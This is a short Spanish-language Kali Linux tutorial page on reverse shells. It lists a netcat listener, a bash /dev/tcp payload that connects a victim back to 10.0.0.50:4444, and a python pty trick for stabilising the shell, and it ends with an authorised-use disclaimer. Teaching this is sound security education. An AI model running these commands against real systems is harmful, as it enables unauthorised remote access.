KALI
Reverse shell
Una reverse shell hace que la víctima se conecte de vuelta a ti, saltándose el firewall de entrada.
Primero, en tu máquina, pones netcat a escuchar en un puerto. Cuando ejecutas el payload de bash en el objetivo, este se conecta a ti y te entrega una shell.
El truco pro: estabilízala con python y pty, así tienes autocompletado y no se muere a la primera. Entender esto es clave para atacar, y también para defender.
# los comandos
kali@kali:~$ nc -lvnp 4444copiarlistening on [any] 4444 ...
victim$ bash -i >& /dev/tcp/10.0.0.50/4444 0>&1copiar$ python3 -c 'import pty;pty.spawn("/bin/bash")'copiarwww-data@web:$ idcopiaruid=33(www-data) gid=33(www-data)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.